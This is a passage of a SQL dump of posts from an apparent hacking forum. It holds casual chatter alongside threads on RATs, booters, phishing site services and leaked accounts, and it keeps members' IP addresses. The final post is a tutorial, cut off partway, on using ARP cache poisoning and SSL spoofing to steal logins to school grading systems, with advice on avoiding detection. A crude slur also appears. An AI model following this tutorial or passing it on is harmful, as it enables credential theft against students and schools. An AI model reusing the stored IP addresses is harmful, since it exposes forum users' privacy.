fresh start for us but I just wanted to make that clear. So sorry and hey.', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', 'f52835e265a6bb62c9ec0b8371122c57', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1415', '305', '0', '84', 'Themejunkies.net theme rip', '0', '2', 'Apathy', '1346471373', 'This is a complete rip. http://mir.cr/09VR4JK3 Credits to whoever did it.', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', '036f429450b871d831c2f0213ce45ab6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1416', '112', '1407', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1346471437', '[quote=\'NXK\' pid=\'1407\' dateline=\'1346463477\'] Id like to get this. PM me whenever you have time :) [/quote] PPD ebooks pack is sent... check your pm now.', '119.154.4.231', '2006582503', '1', '0', '0', '0', '1', '38a97533e0a08bc7bf05785281c1f1eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1418', '228', '921', '12', 'RE: [TUT] A complete guide to RAT', '0', '2', 'Apathy', '1346471922', 'Nice tutorial keep up the good work.', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', '11e4b89856b5508f687206182fc944b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1419', '272', '1243', '4', 'RE: Hello, I\'m Dreamer', '0', '2', 'Apathy', '1346473640', 'Welcome to the forum stay active and have fun.', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', '18e6f6035b34e0dc4868ad5a3ad7b0f2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1420', '305', '1415', '84', 'RE: Themejunkies.net theme rip', '0', '55', 'Baws', '1346480017', 'can we get screenshots or do we got to search site up? :(', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'fe86420320b9fec2e70858526db6dd5a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1421', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '55', 'Baws', '1346480065', 'I\'m winning, stop posting.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '7cee6a0b1ea65f030abaab8c9ae1264a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1422', '252', '1089', '54', 'RE: August 27, 2012 XXXX Accounts', '0', '154', 'fap', '1346496493', 'thanks for this bro :). I\'m sure I will be using one :3.', '86.29.242.162', '1444803234', '0', '0', '0', '0', '1', 'e003c3c4bc54cd13bbc10c51d6809c4c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1423', '284', '1338', '7', 'RE: Typing Speed Test', '0', '67', 'HoverCatz', '1346497798', 'Got 49 as im Norwegian. [url=http://10fastfingers.com/typing-test/english][img]http://img.10fastfingers.com/badge/1_wpm_score_AX.png[/img][/url] Visit the [url=http://10fastfingers.com/typing-test/english]Typing Test[/url] and try!', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'de842d2428c1c23d163742518920271b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1424', '11', '28', '15', 'RE: .EXE Booter Pack', '0', '160', 'Jacob', '1346503511', 'I would like this too. I have to get 10 posts :/', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', 'ffb3c5b57f51cb03fd0ee67c855e91be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1425', '94', '223', '16', 'RE: What is this section about?', '0', '160', 'Jacob', '1346503673', 'Thanks for the info, even if it was copied of WikiPedia.', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', 'aaa794186f5bb51c09335dd78c458f63', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1426', '198', '713', '21', 'RE: [Tutorial] Setting up your own web Booter[Source Included]', '0', '160', 'Jacob', '1346503750', 'I need a good free host for this. Anybody have one?', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '3e88215c813ecce1bd5b3ae6b145b34c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1427', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '160', 'Jacob', '1346503803', 'Can I get this too? PM me the infO?', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '0bd2b438597237a0d0603316409a66c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1428', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1346505643', 'Baws, you\'re not winning. I am.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3b35e41a51896a290b36ae5dde9f01d0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1429', '284', '1338', '7', 'RE: Typing Speed Test', '0', '82', 'iTzIpod', '1346505684', 'Dang it t3h jok3r did better than me :/ :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5bce2e49036df32142966decd790852e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1430', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '2', 'Apathy', '1346533837', 'Could I get this? Thanks man.', '173.206.177.107', '-1378963093', '0', '0', '0', '0', '1', 'b5cdd63d068c8b0ccb90bc75573873b4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1431', '298', '1383', '9', 'RE: ???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '53', 'sirchamp', '1346578468', 'Thanks for the ebook. Its a good method :D', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '02792673039b4330e73a2d259b5da57f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1432', '302', '1405', '53', 'RE: Java DoS Script', '0', '67', 'HoverCatz', '1346588851', '[quote] public static void ubers() { while (true) { System.out.println(\"Fucking yo cpu\");//lol vir=(vir+10)*10/1000000; } } [/quote] -.-', '178.74.56.137', '-1303758711', '1', '0', '67', '1346588870', '1', 'feef98d85629151026ba0f559f5d25d4', '0', '1346588870'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1433', '306', '0', '8', 'Annoying/Catchy Song? [KPOP]', '0', '82', 'iTzIpod', '1346594393', '[video=youtube]http://www.youtube.com/watch?v=1H40wUz-Fd8[/video] The song is called Gangnam Style. And the artist of this song is PSY. Do you find this song annoying/catchy? :p Original Song: [video=youtube]http://www.youtube.com/watch?v=9bZkp7q19f0[/video] Hyuna Version: [video=youtube]http://www.youtube.com/watch?v=wcLNteez3c4[/video]', '24.212.197.164', '416597412', '1', '0', '82', '1346620638', '1', '9c614281119069540c8aa91b25e048cd', '0', '1346620638'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1434', '298', '1383', '9', 'RE: ???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '2', 'Apathy', '1346596200', 'Please send me this. Thanks', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', '3b79ccccbebbfdab27036771c49e8f84', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1435', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '53', 'sirchamp', '1346606493', 'Could I have a copy Thanks', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'fe4a122094f1c0e832e407833126250b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1436', '306', '1433', '8', 'RE: Annoying/Catchy Song? [KPOP]', '0', '61', 'NXK', '1346614322', 'I think everyone finds this song catchy xD', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '3efc7797d188f0339c0a4a5f6f21f805', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1437', '299', '1397', '3', 'RE: Apathy Promoted!!!', '0', '141', 'Bane™', '1346618430', 'Congrats on the promotion, I still believe to much drama is going on here.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', '161b3ce22331c541d2322b7f568fd69d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1438', '305', '1415', '84', 'RE: Themejunkies.net theme rip', '0', '67', 'HoverCatz', '1346618542', '[url=Themejunkies.net]Click here[/url]', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '86ac62d0fcac5f5d7f4a207a0d4c2797', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1439', '265', '1341', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346620249', '[quote=\'Baws\' pid=\'1341\' dateline=\'1346262847\'] Too many people that don\'t know what grammar is in this thread... [/quote] I was on Mobile and also it was like 2 AM or something late at night. I could barely see the keys.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3f1b9e7278dd4793de91a5bf1f9870a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1440', '304', '1414', '3', 'RE: Explainations on recent events.', '0', '82', 'iTzIpod', '1346620340', 'Apology accepted. Hopefully that won\'t happen again.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e586675cbd63fcb9e72ed76f0713ec65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1441', '299', '1412', '3', 'RE: Apathy Promoted!!!', '0', '82', 'iTzIpod', '1346620397', '[quote=\'Apathy\' pid=\'1412\' dateline=\'1346469735\'] [quote=\'iTzIpod\' pid=\'1398\' dateline=\'1346458860\'] I don\'t know about this.. But in other words, Good Luck + Congratulations Apathy. Don\'t blow it this time. [/quote] You also do not know what was going on. :3 but thanks nonetheless. [/quote] You explained everything on your thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '67b3c5d79a28fee3b0a2e674a1842505', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1442', '306', '1436', '8', 'RE: Annoying/Catchy Song? [KPOP]', '0', '82', 'iTzIpod', '1346620515', '[quote=\'NXK\' pid=\'1436\' dateline=\'1346614322\'] I think everyone finds this song catchy xD [/quote] xD. I actually kind of love this song. Especially when they show that ass. Also, there is a Hyuna Version of this song. Hyuna was that girl on the bus/subway. I\'d tap that.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f2b7b4318515607eae1ef10367d7127e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1443', '304', '1414', '3', 'RE: Explainations on recent events.', '0', '1', 't3h jok3r', '1346639981', 'There\'s only one thing I like about this thread which is the bold text, it looks so AWESOME.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'ff5816cf9a43ce160084d4dad5f8df6d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1444', '286', '1343', '3', 'RE: [Announcement] Awards and IP Log History Features', '0', '1', 't3h jok3r', '1346640084', 'No problem, it\'s my duty to inform the community what LH is up to.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '9312f9f61bda07cf97d329cf6d143f60', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1445', '307', '0', '3', '[Announcement] T3h Jok3r is back!!!', '0', '1', 't3h jok3r', '1346640273', 'I was away for a day or two, that\'s because I was flying back home from a holiday. I\'m shocked that when I came back to LH I only had 1 PM, because normally everyday I received at least 10 PMs :D Anyway, I need to catch up on the activity and some stuff so umm can I can some warm welcomes?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '47ef3127986d9f04d178f287ff063b68', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1446', '305', '1415', '84', 'RE: Themejunkies.net theme rip', '0', '1', 't3h jok3r', '1346640824', 'Not a bad theme, it\'s kinda 3D type.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '9db8d48aa835dd6f36d693e47285f2ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1447', '302', '1405', '53', 'RE: Java DoS Script', '0', '4', 'Triple H', '1346640951', 'Uhh credits ubers :D But what\'s wrong with the script?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '13994245ed6a222e8899d8de17a52541', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1448', '307', '1445', '3', 'RE: [Announcement] T3h Jok3r is back!!!', '0', '2', 'Apathy', '1346641821', 'YO my NIGGA from the hood. Just kidding, glad to see you back. :)', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', '47224cffb864ee96a01bad2bf95802ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1449', '304', '1443', '3', 'RE: Explainations on recent events.', '0', '2', 'Apathy', '1346642109', '[quote=\'t3h jok3r\' pid=\'1443\' dateline=\'1346639981\'] There\'s only one thing I like about this thread which is the bold text, it looks so AWESOME. [/quote] So you do not like what I wrote... ._.', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', '63cedd9e9ec1b51aebd3bc9bc3c5ee2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1450', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1346642117', 'So far, only the Unique group was added. Other group ideas were overlooked. Mr. Omni\'s group suggestion was declined because their userbar wasn\'t attractive and I found out that they won\'t be active on LH because of their own website.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'ce87a6871458ceb9033da3e95c809e52', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1451', '304', '1449', '3', 'RE: Explainations on recent events.', '0', '1', 't3h jok3r', '1346642174', '[quote=\'Apathy\' pid=\'1449\' dateline=\'1346642109\'] [quote=\'t3h jok3r\' pid=\'1443\' dateline=\'1346639981\'] There\'s only one thing I like about this thread which is the bold text, it looks so AWESOME. [/quote] So you do not like what I wrote... ._. [/quote] Ehh, damn you caught me :( JK, I found it good because you were kind enough to ask for an apology and explain the situation.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'e1b9a4fe0ca80f5a0625494b3db45629', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1452', '304', '1451', '3', 'RE: Explainations on recent events.', '0', '2', 'Apathy', '1346642327', '[quote=\'t3h jok3r\' pid=\'1451\' dateline=\'1346642174\'] [quote=\'Apathy\' pid=\'1449\' dateline=\'1346642109\'] [quote=\'t3h jok3r\' pid=\'1443\' dateline=\'1346639981\'] There\'s only one thing I like about this thread which is the bold text, it looks so AWESOME. [/quote] So you do not like what I wrote... ._. [/quote] Ehh, damn you caught me :( JK, I found it good because you were kind enough to ask for an apology and explain the situation. [/quote] Righty-O :) I am happy you accepted my apology and let me explain. :) Also glad that we are online BFF once again. xD', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', 'a27b91f06ff2a73d5ff862e3c84d766d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1453', '308', '0', '3', 'Marketplace Removed', '0', '1', 't3h jok3r', '1346642463', 'Marketplace was recently removed due to inactivity. We will add Marketplace and forums that we believe will be active. Marketplace will be added after a couple of months.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '68259f8342c3c2e0233921a9851b0cd0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1454', '307', '1445', '3', 'RE: [Announcement] T3h Jok3r is back!!!', '0', '82', 'iTzIpod', '1346642585', 'Hey t3h jok3r, Welcome back to LH. I missed you </3 Wasn\'t that me that sent you that PM? :p I was going to send more but.. I got lazy and didn\'t want you to come back and have 500 PMs. Welcome Back.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f9514e7843d5c960a8bdbaa0432dddd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1455', '303', '1408', '4', 'RE: Heyo', '0', '1', 't3h jok3r', '1346642596', 'Welcome to L33THacking. Hope you enjoy your stay and stay active :)', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '58450c4a0648ec866cf07adf5a98caef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1456', '309', '0', '61', 'Quick Announcement', '0', '1', 't3h jok3r', '1346642692', 'The unique group is ran by iTzIpod and iTzIpod also moderates this forum. iTzIpod is the head leader of this group. You are free to make this your default group.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '5453efbc0737ba7b45592f6624fe544c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1457', '308', '1453', '3', 'RE: Marketplace Removed', '0', '82', 'iTzIpod', '1346642711', 'Alright. Thanks for the notice. Guess I need to find a new way to get money. Can\'t just rely on PPC/PPD anymore..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7eee807d4d3507475e1fb5a18d2f5b32', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1458', '310', '0', '13', '[ HOT ] How to Hack Your School Grading System [Change]', '0', '5', 'Timmy', '1346643345', '[size=medium][color=#1E90FF]Hello everyone, as it seems that a lot of you guys seem to be in high school and want to be like the \"War Games\" hackers I figured I\'d write a tutorial on how to steal logins for online grading systems. If you\'re school still uses paper to write down and keep track of grades this tutorial is not for you! Please remember to be careful with this information, this is not for you to use only to understand that this is a posibility ;) [/color][/size] [size=medium][color=#FFA500]Step One - Understanding Some Basics (Skip this if you don\'t care what\'s happening behind the scenes)[/color][/size] Now you\'ve got to understand some basics about how computers communicate on a network (if you are familiar with this and have a general understanding of how TCP/IP works then skip this section as it is only for those who want to learn what\'s happening behind the scenes!) I\'ll try to cut down on most information! So basically every computer on a network has an IP address be it \"192.168.1.101\" or \"10.0.0.10\" that is your IP for your computer on your current network. This is your computer\'s \"address\" much like every house has a mailing address to receive postage! So basically all the computers send information through the \"router\" or \"switch\" which passes it on out to the internet and vise versa. The router broadcasts it\'s address to every computer on the network and says \"Hey everyone! I\'m 192.168.1.1 and I\'m your default gateway! Send all your requests through me and I\'ll serve you!\" and all the computers happily send their requests through the router. But what if someone lied about being a certain IP address? In an ARP cache poising situation, this is exactly what a hacker would do. [size=medium][color=#1E90FF]Hacker\'s Computer[/color][/size]: \"Hey 192.168.1.1 (router)! I\'m 192.168.1.100!\" [size=medium][color=#1E90FF]Router[/color][/size]: (Didn\'t ask, but accepts this information) \"OK thank you I\'ll send future data your way!\" [size=medium][color=#1E90FF]Hacker\'s Computer[/color][/size]: \"Hey user 192.168.1.100 (Vlictim)! I\'m you\'re router!\" [size=medium][color=#1E90FF]Vlctim\'s Computer[/color][/size]: (Didn\'t ask, but accepts this information) \"OK thank you I\'ll send my requests through you!\" Now the hacker has places himself in a very great position! He is now a \"proxy\" or a computer that both the router and the vlctim must push their information through. So now if the vlctim wants to visit a webpage all of his data is sent through the hacker\'s computer and on to the router and vise versa. The advantage here is now the hacker can read everything the user is doing online. The problem The main problem with this is that most sites that do \"Online Grading\" encrypt their data before sending it to the router so that this attack is thwarted. The solution Using software like \"Cain & Abel\" you can get around this problem. This is done by spoofing the SSL certificate for the vlctim, however this can not be done completely as the vlctim will get a \"SSL certificate error\" warning message. Luckily in the most used version of Internet Explorer this message is just a simple \"blalla error, click here to continue\" and most users just ignore this and click ok. Now they are connected to the website but you can still see what they are doing! Congrads, you now (kinda) get how an ARP Cache Poising attack works & SSL Spoof attack. [size=medium][color=#FFA500]Step Two - Starting out (If you skipped step one you\'re a bad person!)[/color][/size] [size=medium][color=#FF0000][b]A nice warning you\'ll be doing all this on a school computer, please be careful not to get caught (what if someone actually knows what you\'re trying to do?! Oh noes!) [/b][/color][/size] No you\'re going to need to install Cain & Abel for doing this attack! This is a Windows hacktool with all sorts of fun built in! [url=http://adf.ly/4tgVT]{{{DOWNLOAD HERE}}}[/url] Great! Now install the thing (I\'m not going to hold your hand on this as it\'s really straightforward, just say yes to installing everything) Eventually you install everything and you start up Cain, please be sure you\'ve allowed it internet accept if Windows prompts you for it. Now, you\'re going to need to click the sniffer button in the top left corner. It\'s looks like this: [img]http://i.imgur.com/Y77qq.png[/img] This has started the \"sniffing\" process where your computer will capture any traffic that it sends/receives. At this point this is only the websites you visit but you want to see everyone else\'s internet activity aswell! [size=medium][color=#FFA500]Step Three - Gathering vlctims![/color][/size] Now we are going to get a list of all computers currently on the network so we can poison them. To do this go to the sniffing tab as show below: [img]http://i.imgur.com/71kavl.jpg[/img] Now you\'ve got to start the ARP Cache 